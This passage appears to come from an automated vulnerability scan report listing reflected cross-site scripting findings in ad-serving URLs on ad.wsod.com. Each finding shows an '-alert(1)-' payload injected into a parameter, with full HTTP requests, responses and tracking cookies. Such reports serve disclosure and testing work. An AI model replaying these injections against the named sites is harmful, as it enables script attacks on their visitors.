9hqKb9UW1UfXUu5_t-s3mYQevC2GfmtRhuVY6zT1uCqUTs7wcwsdHQlOWV3VIdjcK2T9k; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8; pf=-jffvaaiYNPx61jB-getKKGyms2bzJ5NxJrHe2QHhR8CR6WdDKKuu1EG8_j0F9lfc-tfcqM5Jblcq-6eY583YF0Qxz0OvdT9GuJ7ViZ2YskPgkp2ShdDLnWVrYTrzrIfKDw8kdmwKgOeuifwfRXx2WIgKeliYqxPi2PuzFXXoEo-VuFfahHlgzh_QOs4p8bLZ2yzZnoMqlwp6K58itScC065x0FBCOqeNn5g6wtVvehK3A4I4wtIxPEx2nGfQAG9-vjZrSxhsgJSHWZlu-7Y8lLwHgaXnw1ge6GUoKaB63xdWz9GlTG1fD_ft3p4jB3znlsrDh8fqPATUgh_nFYrQkkmhbbfarzPZdSY8CyibyS7aDCXeV44OfVe9tEHSeUyDESfPnIeWIxfvM0y6r885gJOIocbmkc1C_88Fb9Lp0WkGr2pIJBbUJJxUowTPiGOvjVZlqhHi0TVaBtC-Ytynv5YO9Q0BRsH9i5yvt_pOdNope6-8bcU90Ecut78VcD3VCzgLVZar6mYj-saVcNK8bDe5HX-E1kIk4gMJUB1k1DJNiwErcR6V9-gMPdB133k3Gz1tfgKNZNU9_cW3FNJIvuoVf7YEa8qj1M0riyKsJMP889UjeORWgIr-IDHwwHe4aa1Pvsy5XpmxG2agnko3_pS6GAtAeZmbNLw3yp4AS1KB2Mkrz2y_-jzio6UgOMjGLgCypEar4RaFruO7KXpg7i87Up8F4Q_b2SCEfNkBVcVdzVlCffFCe9fh2T0OxlJf6yjX4dXAVH9x2WubCsF5Yfka217NmVFFyPB1XAcDp9sC5SExI0LW2uUE1ZEj_0G1W2BjDEY10nhggrTZVpS5CkyEIqZbkE5N4BDovA0bs0vLR8diqAiO12sv249SEi9T8YYfDFrAVtFne37-S8b6b8_zrRSm0Pn_iwZp5Njl1Ctpg-Y8MZ4iEuMM8h57h7sA40WqZv-4bpri7csL2Eha5MQmjlPbOzOgtl-6l2XpIhjxu24jEU-jOAKLeLr8pheLZ-qYOggCRZRzxBfMYedtI1f77e2n42rcO7SrM0VQPxYEPmgvy-5sxMT-JXr-g2mztPqvTmnqVETUDUDPzbGpX7rA2wO8p2W1d8jJh9Wgn5fQv_uySNMh5ni7dKMT_qlR38hdCL1cJUSjCa6-qS_S-29zjxGrVJzGjilqbfEkblssZ3oY8EBiTaXzLFtyqqBeor7c8lwYqgvOkdv7T9_7l0B_Epu2spdJD4h6srOYOyvPs-cbWt3Zsh03akXwoACfppvlMTRqhvXWsl2fX0MhUevEGq1iNRzaKvd2XK6i1aN_2f2T_joajRqNC2KFBlwaF-qXHEx7n0l8K5AqGkS2zWZAZsF6nB55Y-VWuh8k6sEdq2OLdTG1Gbl2PHH_MoRk6zbQBZT5wF4bk7NkJmustC7KfRHZkja4jwEjLaHhlg7ZUy9vbeaGjpbb28szQXKPl5sWT_iHlCQFplL5g_xAwZZxozQ-vwjBbTKEOR4EClMFKBR7NeyYw5CdFipM4nWYHDpnm_yCk_BXR62GHnDChO7-X0Yxrune2xG-PTuWOxbQ3iHJMqt1A83xKmmTpf1YhIPQubDCvHxB0Aj59dKNWd1PyhyVvb3_Imo3z4jO4Q_3rN-08zinn8vOajT3qjsF6G3eK8GfPeHCjDxdpQTpQ; uid=8392341830659049202; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; rds=15054%7C15054%7C15054%7C15056%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Sun, 18-Sep-2011 22:04:29 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:04:29 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=7104343394977138161&fpid=ab508"><script>alert(1)</script>f28986d6202&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b52b0'-alert(1)-'69856e0ae5 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=clickb52b0'-alert(1)-'69856e0ae5&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:45:30 GMT; path=/
Set-Cookie: i_1=25:1456:434:106:0:42422:1300909530:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:45:30 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 904

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=clickb52b0'-alert(1)-'69856e0ae5&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703
...[SNIP]...

1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47721'-alert(1)-'0ea823b3fbc was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=48323847721'-alert(1)-'0ea823b3fbc&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:46:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:46:21 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909581:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:46:21 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=48323847721'-alert(1)-'0ea823b3fbc&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,454
...[SNIP]...

1.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2edd'-alert(1)-'7991b1a15c5 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442a2edd'-alert(1)-'7991b1a15c5&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:45:54 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909554:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:45:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442a2edd'-alert(1)-'7991b1a15c5&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,452
...[SNIP]...

1.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fc65'-alert(1)-'9bd97f7bd61 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=7fc65'-alert(1)-'9bd97f7bd61 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:47:57 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909677:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:47:57 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=7fc65'-alert(1)-'9bd97f7bd61http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.839.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

1.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81418'-alert(1)-'8b88db78e28 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,4780581418'-alert(1)-'8b88db78e28&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:47:16 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909636:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:47:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,4780581418'-alert(1)-'8b88db78e28&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.839.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to
...[SNIP]...

1.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd5c5'-alert(1)-'e83e60bd0c4 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204bd5c5'-alert(1)-'e83e60bd0c4&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:46:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:46:50 GMT; path=/
Set-Cookie: i_1=25:1456:434:106:0:42422:1300909610:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:46:50 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 905

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204bd5c5'-alert(1)-'e83e60bd0c4&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604
...[SNIP]...

1.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 715c6'-alert(1)-'26a8514aef5 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

